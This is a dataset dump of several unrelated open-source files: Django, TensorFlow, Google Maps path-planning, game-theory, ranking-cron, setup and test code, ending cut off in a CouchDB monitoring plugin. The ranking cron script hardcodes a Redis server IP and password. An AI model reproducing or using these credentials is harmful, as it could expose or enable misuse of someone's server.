test_form_validation(test_data):\n form_data, supposed_errors = test_data\n form = HeadForm(form_data)\n assert form.is_valid() == (not supposed_errors)\n assert set(supposed_errors.keys()) == set(form.errors.keys())\n for error_field, error_key in supposed_errors.items():\n assert form.errors[error_field][0]['error_key'] == error_key\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/forms/head_form_test.py","file_name":"head_form_test.py","file_ext":"py","file_size_in_byte":5008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42969108309","text":"# -*- coding: utf-8 -*-\n\nfrom . 
import views\r\n\r\nfrom django.urls import path\r\n\r\napp_name = 'DDL'\r\nurlpatterns = [\r\n\r\n    path('', views.loadHomePage, name='loadHomePage'),\r\n    path('OrderOnline/',views.OrderOnline, name='OrderOnline'),\r\n    path('FlashDeliverPrice/',views.FlashDeliverPrice, name='FlashDeliverPrice'),\r\n    path('CodeLoginPage/',views.CodeLoginPage, name='CodeLoginPage'),\r\n    path('ConfirmOrder/',views.ConfirmOrder, name='ConfirmOrder'),\r\n    path('MyFlashDeliver/',views.MyFlashDeliver, name='MyFlashDeliver'),\r\n    path('SchoolFlashDriver/',views.SchoolFlashDriver,name='SchoolFlashDriver'),\r\n    path('SignupPage/',views.SignupPage,name='SignupPage'),\r\n    path('LoginPage/',views.LoginPage,name='LoginPage'),\r\n    path('recharge/',views.Recharge,name='Recharge'),\r\n    path('MyBalance/',views.Mybalance,name='Mybalance'),\r\n    path('regist/', views.regist, name='regist'),\r\n    path('login/', views.login, name='login')\r\n]\r\n\r\n","repo_name":"MrRainbowYoo/FlashDeliver","sub_path":"DDL/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73472766482","text":"programming_dictionary = {\"Bug\": \"An error in a program that prevents the program from running as expected\", \n\t\"Function\": \"A piece of code that you can easily call over and over again\",\n\t\"Loop\": \"The action of doing something over and over again\"\n}\n\nprint(programming_dictionary['Bug'])\n\n# adding new key\nprogramming_dictionary['must'] = \"to add a new data\"\n\n# changing key values\nprogramming_dictionary['must'] = \"You should add a number\"\n\n# # making dictionary empty\n# programming_dictionary = {}\n\n# loop through a dictionary\nfor thing in programming_dictionary:\n\tprint(thing)\n\tprint(programming_dictionary[thing])\n\n\n\n\n# grading criteria system\n\nstudent_score = {\n\t\"Harry\": 81,\n\t\"Ron\": 78,\n\t\"Hermoine\": 99,\n\t\"Draco\": 74,\n\t\"Neville\": 62\n}\n\nstudent_grade = {}\n\nfor name in student_score:\n\tscore = student_score[name]\n\tif score > 90:\n\t\tstudent_grade[name] = 'Outstanding'\n\telif score > 80:\n\t\tstudent_grade[name] = 'Exceeds Expectation'\n\telif score > 70:\n\t\tstudent_grade[name] = \"Acceptable\"\n\telif score <= 70:\n\t\tstudent_grade[name] = \"Fail\"\n\nprint(student_grade)\n\n# nesting of dictionary with list\n\n# normal dict\ncountry = {\n\t\"france\": \"paris\",\n\t\"germany\": \"Berlin\"\n}\n\n# dict with list as values of key\ncountry_travel = {\n\t\"France\" : ['peris', 'Lille'],\n\t\"Germany\": ['stuggart', 'berlin', 'Hamburg']\n}\n\n# dict with dict and list\n\ncountry_travel_value = {\n\t\"France\" : {\"city_visited\":['peris', 'Lille'], \"total_visits\": 12},\n\t\"Germany\": {\"city_visited\": ['stuggart', 'berlin', 'Hamburg'], \"total_visits\": 22}\n}\nprint(country_travel_value)\n\n# nesting dict in list\ntravel_log = [\n\t{\n\t \"country\":\"France\", \n\t \"city_visited\":['peris', 'Lille'], \n\t \"total_visits\": 12\n\t},\n\t{\n\t \"country\":\"Germany\", \n\t \"city_visited\": ['stuggart', 'berlin', 'Hamburg'], \n\t \"total_visits\": 22\n\t}\n]\n\n\ndef add_new_country(country, time, city):\n\tnew = {}\n\tnew['country'] = country\n\tnew['city_visited'] = city\n\tnew['total_visits'] = time\n\treturn new\n\ndictinary = add_new_country(\"Russia\", 2, [\"Moscow\", 
\"Saint\"])\ntravel_log.append(dictinary)\n\nprint(travel_log)","repo_name":"harshesh/100Days-python","sub_path":"day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73975290001","text":"# Imports\nimport sys\nimport argparse\nimport json\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom os import listdir\nfrom os.path import isfile, join\nfrom PIL import Image\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# Methods\ndef prepareImg(image, label, imgShape):\n image = tf.cast(image, tf.float32) # Typecast raw image values to float32\n image = tf.image.resize(image, tuple(imgShape)) # Overwrite image with resized image\n image /= 255.0 # Normalize to maximum value of byte which is used to display R/G/B channels ((2^8)-1 = 255)\n return image, label\n\ndef process_image(npImg, imgShape):\n tensor = tf.convert_to_tensor(npImg) # Convert NP array to TF tensor\n prepImg, dummy = prepareImg(tensor, None, imgShape) # Returns resized + normalized image\n return prepImg.numpy()\n\ndef predict(image_path, model, top_k):\n # Load image from path and do pre-processing\n loadedImg = Image.open(image_path)\n loadedNpImg = np.asarray(loadedImg)\n inputLayerShape = model.layers[0].input_shape[1:3] # Get shape of input layer of Kera model, example for .input_shape[]: (None, 224, 224, 3)\n procImg = np.expand_dims(process_image(loadedNpImg, inputLayerShape), axis=0) # Add extra dimension at position 0 (=first position, axis does not mean row/col here)\n\n # Perform feedforward prediction to retrieve probs\n predProbs = model.predict(procImg) # get probabilities for classes given the provided image\n \n # Provide probabilities and classes\n topKsIdx = (-1 * predProbs[0]).argsort()[:top_k] # Get indices of top k (highest) probabilities; use negative numbers for all vals to get correct order\n probs = [predProbs[0][i] for i in topKsIdx] # contains top k probs\n classes = topKsIdx + 1 # add +1 to represent class number as there is no class '0'\n return probs, classes\n\n# Parse arguments from CLI\nparser = argparse.ArgumentParser(description='Keras Predictor - script that can predict probabilities and classes for given images')\n\nparser.add_argument(dest='imgPath', action='store', type=str, help='File path to the image to be classified. If a directory is passed, the whole directory will be used.')\nparser.add_argument(dest='modelPath', action='store', type=str, help='File path to the image to be classified')\nparser.add_argument('--top_k', dest='top_k', type=int, action='store', default=1,\\\n help='Return the top k most likely classes')\nparser.add_argument('--category_names', dest='jsonPath', type=str, action='store', default='',\\\n help='Add file path to JSON file to map class IDs to category names')\n \nargs = vars(parser.parse_args()) # Store args\n\n# Get all absolute files in image directory\nimgPath = args['imgPath']\nif imgPath.endswith(('.jpg', '.png', '.gif')):\n absFilePaths = [imgPath]\nelse:\n absFilePaths = [join(imgPath,f) for f in listdir(imgPath) if isfile(join(imgPath,f))] # Check for all folders/files in dir and only use files\n\n# Load model\ntry:\n model = tf.keras.models.load_model(args['modelPath'], custom_objects={'KerasLayer':hub.KerasLayer})\nexcept:\n print(\"Not able to load the Keras model from the given path. 
Please check and try again.\")\n sys.exit() # Exit due to unsolveable isse\n\n# Predict for all files in directory\nfor imgFilePath in absFilePaths:\n try:\n probs, classes = predict(imgFilePath,model,args['top_k'])\n except:\n print(\"Not able to make predictions for the given images path. Please check and try again.\")\n sys.exit() # Exit due to unsolveable isse\n \n # Get class names from json if argument was passed \n class_names = {}\n try:\n if args['jsonPath'] != '':\n with open(args['jsonPath'], 'r') as f:\n class_names = json.load(f)\n except:\n print(\"Not able to load the category names from the given JSON path. Please check and try again.\")\n sys.exit() # Exit due to unsolveable isse\n \n # Print corresponding file path, predictions and classes / class names\n print(\"Evaluated sample: {}\".format(imgFilePath))\n for i in range(len(probs)):\n if len(class_names) > 0: # JSON class names defined\n print(\"Rank #{}: Class '{}' with a probability of {:.0%}\".format(i,class_names[str(classes[i])],probs[i]))\n else:\n print(\"Rank #{}: Class '{}' with a probability of {:.0%}\".format(i,classes[i],probs[i]))","repo_name":"fabianprx/mlnd_image_classifier","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28742612905","text":"import googlemaps\nimport numpy as np\nimport math\n\nfrom utils import R_x, R_z\nfrom pyproj import CRS, Transformer, Proj\nfrom haversine import haversine\nfrom constants import (\n GMAPS_KEY,\n TOP_LEFT_CORNER,\n BOTTOM_RIGHT_CORNER,\n TOP_RIGHT_CORNER,\n BOTTOM_LEFT_CORNER,\n IMAGE_HEIGHT,\n IMAGE_WIDTH,\n ORIGIN,\n)\n\n\nclass MyTransformer:\n \"\"\"Coordinate and Reference Frame Transformer\"\"\"\n\n @staticmethod\n def transform(lat, lon):\n \"\"\"Transforms (lat, lon) ECEF into (e, n) ENU\"\"\"\n wgs84_geod = CRS.from_epsg(4326)\n wgs84_geoc = CRS.from_epsg(4978)\n transformer = Transformer.from_crs(wgs84_geod, wgs84_geoc)\n\n xyzORIGIN = np.array([*transformer.transform(ORIGIN[0], ORIGIN[1], 89)])\n xyzPoint = np.array([*transformer.transform(lat, lon, 89)])\n\n return tuple(\n np.array(\n [\n *(\n (xyzPoint - xyzORIGIN)\n @ R_z(math.radians(ORIGIN[1]) + np.pi / 2)\n @ R_x(np.pi / 2 - math.radians(ORIGIN[0]))\n )\n ]\n )[:2]\n )\n\n @staticmethod\n def invtransform(e, n):\n \"\"\"Transforms (e, n) ENU into (lat, lon) ECEF\"\"\"\n wgs84_geod = CRS.from_epsg(4326)\n wgs84_geoc = CRS.from_epsg(4978)\n transformer = Transformer.from_crs(wgs84_geod, wgs84_geoc)\n invtransformer = Transformer.from_crs(wgs84_geoc, wgs84_geod)\n\n xyzORIGIN = np.array([*transformer.transform(ORIGIN[0], ORIGIN[1], 89)])\n enuPoint = np.array([e, n, 0])\n\n xyzPoint = tuple(\n np.array(\n [\n *(\n enuPoint\n @ R_x(math.radians(ORIGIN[0]) - np.pi / 2)\n @ R_z(-math.radians(ORIGIN[1]) - np.pi / 2)\n + xyzORIGIN\n )\n ]\n )\n )\n\n return tuple(\n np.array(\n [*invtransformer.transform(xyzPoint[0], xyzPoint[1], xyzPoint[2])]\n )[:2]\n )\n\n\nclass Map:\n \"\"\"Path planning (using google maps API for now)\"\"\"\n\n def __init__(self) -> None:\n self.gmaps = googlemaps.Client(key=GMAPS_KEY)\n\n self.transformer = MyTransformer()\n\n self.top_left_coord = np.array(\n [*self.transformer.transform(TOP_LEFT_CORNER[0], TOP_LEFT_CORNER[1])]\n )\n self.bottom_right_coord = np.array(\n [\n *self.transformer.transform(\n BOTTOM_RIGHT_CORNER[0], BOTTOM_RIGHT_CORNER[1]\n )\n ]\n )\n self.top_right_coord = np.array(\n 
[*self.transformer.transform(TOP_RIGHT_CORNER[0], TOP_RIGHT_CORNER[1])]\n )\n self.bottom_left_coord = np.array(\n [*self.transformer.transform(BOTTOM_LEFT_CORNER[0], BOTTOM_LEFT_CORNER[1])]\n )\n self.scale_x = IMAGE_WIDTH / (\n np.linalg.norm(self.bottom_left_coord - self.bottom_right_coord)\n )\n self.scale_y = IMAGE_HEIGHT / (\n np.linalg.norm(self.top_left_coord - self.bottom_left_coord)\n )\n\n def rotate_points(self, points: np.array, angle: float):\n \"\"\"Rotates the points by `angle` radians\n\n Parameters\n ----------\n\n points: np.array of shape (N, 2)\n Points to be rotated\n\n angle: float\n Angle in radians\n\n Returns\n -------\n\n np.array of shape (N, 2)\n Rotated points\n \"\"\"\n\n rotation_matrix = np.array(\n [\n [np.cos(angle), -np.sin(angle)],\n [np.sin(angle), np.cos(angle)],\n ]\n )\n\n return np.array([rotation_matrix @ point for point in points])\n\n def verify_point(self, point, threshold=0.01):\n \"\"\"Checks if the point is valid\n\n Parameters\n ----------\n\n point: np.array of shape (2, )\n Point to be checked\n\n Returns\n -------\n\n bool\n True if the point is within the map, False otherwise\n \"\"\"\n new_point = self.gmaps.nearest_roads(point)\n new_point = np.array(\n [\n new_point[0][\"location\"][\"latitude\"],\n new_point[0][\"location\"][\"longitude\"],\n ]\n )\n\n # disance between the point and the nearest road\n distance = haversine(point, new_point)\n\n # maybe pass to x, y so that we can better understand the distance limit\n\n if distance < threshold:\n return True\n return False\n\n def get_coordinates(self, latitude: float, longitude: float):\n \"\"\"Transforms latitude and longitude to cartesian coordinates\n\n Parameters\n ----------\n\n latitude: float\n Latitude in degrees\n\n longitude: float\n Longitude in degrees\n\n Returns\n -------\n\n np.array of shape (2, )\n Cartesian coordinates\n \"\"\"\n arr = np.array(\n [\n np.array([*self.transformer.transform(latitude, longitude)])\n # - self.bottom_left_coord\n ]\n )\n\n return arr * np.array([self.scale_x, self.scale_y])\n\n def get_latlon(self, east: float, north: float):\n \"\"\"Transforms cartesian coordinates into latitude and longitude\n\n Parameters\n ----------\n\n east: float\n East (x) coordinate in meters\n\n north: float\n North (y) coordinate in meters\n\n Returns\n -------\n\n np.array of shape (2, )\n Geodetic coordinates\n \"\"\"\n arr = np.array([east, north]) / np.array([map.scale_x, map.scale_y])\n arr = np.array([np.array([*self.transformer.invtransform(east, north)])])\n\n return arr * np.array([self.scale_x, self.scale_y])\n\n def reflect_points(self, points: np.array):\n \"\"\"Reflects the points\n\n Parameters\n ----------\n\n points: np.array of shape (N, 2)\n Points to be reflected\n\n Returns\n -------\n\n np.array of shape (N, 2)\n Reflected points\n \"\"\"\n\n reflection_matrix = np.array(\n [\n [1, 0],\n [0, -1],\n ]\n )\n\n return np.array([reflection_matrix @ point for point in points])\n\n def get_points(self, start: np.array, end: np.array):\n \"\"\"Gets the points between `start` and `end` point\n\n Parameters\n ----------\n\n start: np.array of shape (2, )\n Latitude and longitude of starting point\n\n end: np.array of shape (2, )\n Latitude and longitude of destination point\n\n Returns\n -------\n\n np.array of shape (N, 2) where N is the number of points\n Obtained path points in cartesian coordinates\n \"\"\"\n\n # Latitude and longitude coordinates of the two points\n point1 = (start[0], start[1])\n point2 = (end[0], end[1])\n\n # Calculate 
the distance between the two points\n distance = haversine(point1, point2)\n\n # Set the number of points you want to generate along the line\n num_points = int(distance * 400)\n\n # Calculate the latitude and longitude increments for each point\n lat_inc = (end[0] - start[0]) / (num_points - 1)\n lon_inc = (end[1] - start[1]) / (num_points - 1)\n\n # Generate the points\n points = []\n for i in range(num_points):\n points.append(\n np.array(\n [\n start[0] + (i * lat_inc),\n start[1] + (i * lon_inc),\n ]\n )\n )\n\n return np.array(points)\n\n def get_path(self, start: np.array, end: np.array):\n \"\"\"Gets the path from `start` to `end` point\n\n Parameters\n ----------\n\n start: np.array of shape (2, )\n Latitude and longitude of starting point\n\n end: np.array of shape (2, )\n Latitude and longitude of destination point\n\n Returns\n -------\n\n np.array of shape (N, 2) where N is the number of points\n Obtained path points in cartesian coordinates\n \"\"\"\n\n path = np.array(\n [\n [step[\"end_location\"][\"lat\"], step[\"end_location\"][\"lng\"]]\n for step in self.gmaps.directions(\n start,\n end,\n mode=\"driving\",\n alternatives=False,\n units=\"metric\",\n )[0][\"legs\"][0][\"steps\"]\n ]\n )\n path = np.insert(path, 0, start, axis=0)\n new_path = []\n for i in range(len(path) - 1):\n new_path.extend(self.get_points(path[i], path[i + 1]))\n\n new_path = np.array(new_path)\n\n # Get rid of 2-way roads\n temp = []\n originalIndex = -1\n segment_size = 100\n path_segments = [\n new_path[i : i + segment_size]\n for i in range(0, len(new_path), segment_size)\n ]\n for segment in path_segments:\n segment_result = self.gmaps.nearest_roads(segment)\n for step in segment_result:\n if originalIndex != step[\"originalIndex\"]:\n temp.append(\n [step[\"location\"][\"latitude\"], step[\"location\"][\"longitude\"]]\n )\n originalIndex = step[\"originalIndex\"]\n\n origin_coord = self.transformer.transform(start[0], start[1])\n\n coords = np.zeros((len(temp), 2))\n for i in range(len(temp)):\n coords[i] = self.get_coordinates(temp[i][0], temp[i][1])\n\n return coords\n\n def round_path(self, path: np.array) -> np.array:\n \"\"\"\n Rounds the corners of path and returns the new path\n \"\"\"\n points_to_remove = list()\n for i, point in enumerate(path[3:-3], 3):\n if (\n abs(np.tensordot(path[i + 1] - point, point - path[i - 1], axes=1))\n < 0.01\n ): # if the cross dot is small -> cos() is small -> angle between points is close to 90º\n rot_center = (\n path[i - 3] + path[i + 3] - point\n ) # last point of a square formed by the sum of the point behind with the upfront vector\n\n # vector between the two edges of square (one point is the edge of the curve (point) and the center of rotation (rot_center) )\n vector = point - rot_center\n angle = np.arctan2(vector[1], vector[0])\n vector = (\n np.linalg.norm(vector)\n * 0.8\n * np.array([np.cos(angle), np.sin(angle)])\n )\n\n # obtain a point that is now closer to the center of rotation of the curve\n desired_point = vector + rot_center\n path[i][0], path[i][1] = desired_point[0], desired_point[1]\n\n # remove the points that were close to remove the edge\n points_to_remove.append(i - 1)\n points_to_remove.append(i + 1)\n points_to_remove.append(i + 2)\n path = np.delete(path, points_to_remove, axis=0)\n return path\n\n def orient_path(self, path: np.array) -> np.array:\n oriented_path = np.zeros(shape=(len(path), 4))\n\n for i in range(0, len(path)):\n oriented_path[i][:2] = path[i]\n\n if i < len(path) - 1:\n # Add phi\n oriented_path[i][3] 
= np.arctan2(\n (path[i + 1][1] - path[i][1]), (path[i + 1][0] - path[i][0])\n )\n else:\n oriented_path[i][3] = oriented_path[i - 1][3]\n oriented_path[i][2] = oriented_path[i][3]\n\n return oriented_path\n","repo_name":"TiagoLourinho/autonomous-car","sub_path":"source/blocks/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":11938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"3875233402","text":"from array import array\nimport numpy as np\nimport nashpy as nash\n\n# Crear matriz de pago\nA = np.array([[4, 0], [0, 2]]) # A es la fila del jugador\nB = np.array([[2, 0], [0, 4]]) # B es la columna del jugador\ngame2 = nash.Game(A, B)\ngame2\n# Encuentre el equilibrio de Nash\ngetEquilibrium= lambda: game2.support_enumeration()\n\nprint(\"-------Estrategias Mixtas---------\")\nprint(\"3 lineas de salida\")\neq = getEquilibrium()\nfor item in eq:\n print(item)\n\neq = getEquilibrium()\nsigma_r, sigma_c = [array for array in eq][-1]\npd = nash.Game(A, B)\n\nprint()\nprint(\"Punto de equilibrio con estrategias mixtas\")\nprint(pd[sigma_r, sigma_c])\nprint(\"-------------FIN-------------------\")\n","repo_name":"ggomez0/InvOpeII-ProyFinal","sub_path":"Unidad I - Teoria de Juegos/EstMixtas_Arratia_Gomez.py","file_name":"EstMixtas_Arratia_Gomez.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3928624596","text":"# -*- coding: utf-8 -*-\n__author__ = 'Administrator'\n\nimport sys\nimport time\nimport redis\nfrom sqlalchemy.sql import select, update, delete, insert, and_, subquery, not_, null, func, text,exists,desc\n\nfrom config.rank import *\nfrom db.connect import *\nfrom db.rank_charge_top import *\nfrom db.user import *\nfrom db.rank_make_money_top import *\nfrom helper import datehelper\nfrom hall.hallobject import *\n\nRANK_REWARD = {\n # 金币,钻石,vip经验,[(道具1,数量),(道具2,数量),]\n 'rank_charge_top':(10000,1000,1000,[(1,12),(2,24)],),\n 'rank_gold_top':(10000,1000,1000,[(1,12),(2,24)],),\n 'rank_make_money_top':(10000,1000,1000,[(1,12),(2,24)],),\n}\nREDIS_CONF = {\n 'host':'121.201.29.89','port':26379,'db':0,'password':'Wgc@123456',\n}\n\nDAILY_KEY = 'DailyTasks'\nsession = Session()\nclass CrondServer:\n\n def __init__(self):\n self.redis = redis.Redis(**REDIS_CONF)\n\n # self.da = DataAccess(self.redis)\n\n def load_data(self, rank_type):\n return getattr(self, 'load_'+rank_type)()\n\n def save_data(self, rank_type, top_one, top_index):\n return getattr(self, 'save_'+rank_type)(rank_type, top_one, top_index)\n\n def load_rank_charge_top(self):\n return session.query(TRankChargeTop).filter(TRankChargeTop.add_date == datehelper.get_yesterday().strftime('%Y-%m-%d')).order_by(desc(TRankChargeTop.charge_money)).limit(RANK_CHARGE_REWARD)\n def load_rank_gold_top(self):\n return session.query(TUser).order_by(desc(TUser.gold)).limit(RANK_WEALTH_REWARD)\n def load_rank_make_money_top(self):\n last_week = int(time.strftime('%W')) -1\n if last_week == 0:\n last_week = 1\n return session.query(TRankMakeMoneyTop).filter(and_(TRankMakeMoneyTop.add_year == time.strftime('%Y'), TRankMakeMoneyTop.week_of_year == last_week)).order_by(desc(TRankMakeMoneyTop.gold)).limit(RANK_MAKE_MONEY_REWARD)\n\n\n def save_rank_charge_top(self, rank_type, top_one, top_index):\n if top_index >= RANK_CHARGE_REWARD:\n return\n\n user = top_one['uid'] if hasattr(top_one,'uid') else top_one['id']\n if top_one.charge_money is None:\n return\n\n 
reward_diamond = int(top_one.charge_money) / RANK_CHARGE_RATE\n\n MessageObject.send_mail(session, user,0,\n title = u'充值榜奖励',\n content = RANK_CHARGE_MAIL % (top_index+1,reward_diamond),\n type = 1,\n diamond = reward_diamond,\n gold = 0,\n items = '')\n\n\n def save_rank_gold_top(self, rank_type, args):\n self.save_rank_charge_top(rank_type,args)\n\n def save_rank_make_money_top(self, rank_type, top_one, top_index):\n if top_index >= RANK_MAKE_MONEY_REWARD:\n return\n\n user = top_one['uid'] if hasattr(top_one,'uid') else top_one['id']\n\n MessageObject.send_mail(session,user,0,\n title = u'赚金榜奖励',\n content = RANK_MAKE_MONEY_MAIL % (top_index+1,RANK_MAKE_MONEY_REWARD_CONF[top_index+1]),\n type = 1,\n diamond = RANK_MAKE_MONEY_REWARD_CONF[top_index+1],\n gold = 0,\n items = '')\n\n\n\n def run(self, func_name):\n items = self.load_data(func_name)\n for index,item in enumerate(items):\n self.save_data(func_name, item, index)\n session.flush()\n\n def remove_daily_task(self):\n self.redis.delete(DAILY_KEY)\nif __name__ == '__main__':\n crond = CrondServer()\n if len(sys.argv) > 3:\n func_name = sys.argv[1]\n param_name = sys.argv[2]\n getattr(crond, func_name)(param_name)\n else:\n func_name = sys.argv[1]\n getattr(crond, func_name)()\n\n\n # python -m crond.rank run rank_charge_top\n # python -m crond.rank run rank_make_money_top\n # python -m crond.rank remove_daily_task","repo_name":"1suming/zjh_2017","sub_path":"code/crond/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39190914539","text":"from __future__ import print_function, absolute_import, division, unicode_literals\n\nimport os\n\nfrom setuptools import find_packages, setup\n\n_HERE = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(_HERE, 'README.md'), 'r') as f:\n long_desc = f.read()\n\nsetup(\n name='hyp3proclib',\n use_scm_version=True,\n description='HyP3 process communication and IO library plugin',\n long_description=long_desc,\n long_description_content_type='text/markdown',\n\n url='https://github.com/asfadmin/hyp3-proc-lib',\n\n author='ASF APD/Tools Team',\n author_email='uaf-asf-apd@alaska.edu',\n\n license='BSD-3-Clause',\n include_package_data=True,\n\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Topic :: Software Development :: Libraries',\n ],\n\n install_requires=[\n 'boto3',\n 'hyp3lib~=1.0',\n 'importlib_metadata',\n 'pillow',\n 'psycopg2',\n 'requests',\n 'six',\n ],\n\n extras_require={\n 'develop': [\n 'pytest',\n 'pytest-cov',\n 'pytest-console-scripts',\n ]\n },\n\n packages=find_packages(),\n\n # entry_points={'console_scripts': [\n # ]\n # },\n\n zip_safe=False,\n)\n","repo_name":"asfadmin/hyp3-proc-lib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43373200269","text":"n, p, q = map(int, input().split())\nif n == 0 :\n print(1)\n exit(0)\n \nd = dict()\nd[0] = 1\n\ndef calc(num) : \n global p, q\n if num not in d :\n d[num] = 0\n \n ip = int(num / p)\n iq = int(num / q)\n \n if ip not in d :\n 
d[num] += calc(ip)\n else :\n d[num] += d[ip]\n \n if iq not in d :\n d[num] += calc(iq)\n else :\n d[num] += d[iq]\n \n return d[num]\n \nprint(calc(n))","repo_name":"hobin-jang/baekjoon","sub_path":"python/1351.py","file_name":"1351.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"21838020516","text":"import unittest\n\nfrom botlang import Parser\n\n\nclass ASTTestCase(unittest.TestCase):\n\n def test_copy(self):\n\n original_ast = Parser.parse(\"\"\"\n (begin\n [define entry-node\n (bot-node (input-data)\n [define message (input-message)]\n [define first-name [get (split (get input-data \"name\")) 0]]\n [define data (put input-data \"first-name\" first-name)]\n (cond\n [(match? \"SUCURSAL_.+\" message)\n (node-result data (sucursal-info message) end-node)\n ]\n [else\n (entry-section data (append \"Hola \" first-name))\n ]\n )\n )\n ]\n (bot-node (data)\n [define msg (input-message)]\n (if (equal? msg \"\")\n (node-result data \"\" end-node)\n (entry-node data)\n )\n )\n )\n \"\"\", source_id='test')[0]\n\n ast_copy = original_ast.copy()\n entry_node_body_copy = ast_copy.expressions[0].expr.body\n entry_node_body_copy.expressions[0].name = 'mensajito'\n\n entry_node_body_original = original_ast.expressions[0].expr.body\n self.assertEqual(\n entry_node_body_original.expressions[0].name,\n 'message'\n )\n self.assertEqual(\n entry_node_body_copy.expressions[0].name,\n 'mensajito'\n )\n\n self.assertEqual(\n entry_node_body_original.s_expr,\n entry_node_body_copy.s_expr\n )\n","repo_name":"PostCenter/botlang","sub_path":"tests/test_ast.py","file_name":"test_ast.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18681399668","text":"# -*- coding: utf-8 -*-\n\nimport base64\nimport json\n\nfrom base import SimpleService\n\ntry:\n import urllib.request as urllib2\nexcept ImportError:\n import urllib2\n\nDELTA = {}\n\n\nclass Service(SimpleService):\n def __init__(self, configuration=None, name=None):\n SimpleService.__init__(self, configuration=configuration, name=name)\n self.monitoring_dbs = self.configuration.get('monitoring_dbs')\n self.monitoring_dbs = ['one', 'two']\n # self.untrack_dbs = self.configuration.get('untrack_dbs', ['_replicator', '_users'])\n # self.baseurl = self.configuration.get('url')\n self.baseurl = 'http://10.0.0.10:5984'\n self.active_tasks_url = '{}/_active_tasks/'.format(self.baseurl)\n self.user = self.configuration.get('couch_username') or None\n self.password = self.configuration.get('couch_password') or None\n self.encoded_auth = None\n if self.user and self.password:\n self.encoded_auth = base64.encodestring('%s:%s' % (self.user, self.password)).replace('\\n', '')\n self.repl_order = []\n self.repl_definitions = {}\n self.data = {}\n def check(self):\n try:\n # check connection\n check_dbs = self.monitoring_dbs[:]\n for db in check_dbs:\n status = self._get_stats_data(db)\n if not status:\n self.error('Cant connect to database %s, passing it' % db)\n self.monitoring_dbs.remove(db)\n if len(self.monitoring_dbs) == 0:\n self.error('No more databases left.')\n return False\n else:\n self.info('Database %s checked' % db)\n\n except Exception as e:\n self.error('Error in check: {}'.format(str(repr(e))))\n return False\n return True\n\n def _get_response(self, url):\n \"\"\"\n Return json-formatted list from url\n :param url: string\n :return: list or False\n 
\"\"\"\n try:\n request = urllib2.Request(url)\n if self.encoded_auth:\n request.add_header(\"Authorization\", \"Basic %s\" % self.encoded_auth)\n response_raw = urllib2.urlopen(request).read()\n response = json.loads(response_raw)\n except IOError as e:\n self.error('Error in getting {}: {}'.format(url, str(repr(e))))\n response = False\n return response\n\n def __flush_data(self):\n # !!! POSSIBLE ISSUES\n for key in self.data.keys():\n if 'source_seq' in key or 'checkpointed_seq' in key:\n del self.data[key]\n else:\n self.data[key] = 0\n\n def __calc_delta(self, *args):\n \"\"\"\n Calc delta (difference) between current and previous metric data \n :param args: str\n :return: None\n \"\"\"\n for metric in args:\n delta_metric = '{}_delta'.format(metric)\n if self.data[metric] is None:\n self.data[metric] = 0\n if metric not in DELTA:\n DELTA[metric] = self.data[metric]\n current = self.data[metric]\n difference = self.data[metric] - DELTA[metric]\n self.data[delta_metric] = difference\n DELTA[metric] = current\n\n def __get_host_and_db(self, url):\n \"\"\"\n Cut and return host and db of remote server from given url \n :param url: str\n :return: str\n \"\"\"\n import re\n if 'http' in url:\n if '@' in url: # if auth\n source = re.split('[/:@]', url)[5]\n db = re.split('[/:@]', url)[7]\n else:\n source = re.split('[/:]', url)[3]\n db = re.split('[/:@]', url)[5]\n else:\n source = 'localhost'\n db = url\n return source, db\n\n def _get_stats_data(self, db_name):\n \"\"\"\n Get data from http://localhost:couch_port/db_name/\n and store it in self.data.\n :param db_name: str\n :return: None or False\n \"\"\"\n db_stats_url = '{}/{}'.format(self.baseurl, db_name)\n db_stats = self._get_response(db_stats_url)\n if not db_stats:\n return False\n else:\n try:\n self.data['{}_data_size'.format(db_name)] = db_stats['data_size'] / 1000000\n self.data['{}_disk_size_overhead'.format(db_name)] = \\\n (db_stats['disk_size'] - db_stats['data_size']) / 1000000\n self.data['{}_docs'.format(db_name)] = db_stats['doc_count']\n self.data['{}_docs_deleted'.format(db_name)] = db_stats['doc_del_count']\n self.data['{}_committed_db_seq'.format(db_name)] = \\\n db_stats['committed_update_seq']\n self.data['{}_update_db_seq'.format(db_name)] = db_stats['update_seq']\n self.__calc_delta(\n '{}_docs'.format(db_name),\n '{}_docs_deleted'.format(db_name),\n '{}_committed_db_seq'.format(db_name),\n '{}_update_db_seq'.format(db_name)\n )\n self.__create_stats_charts(db_name)\n except 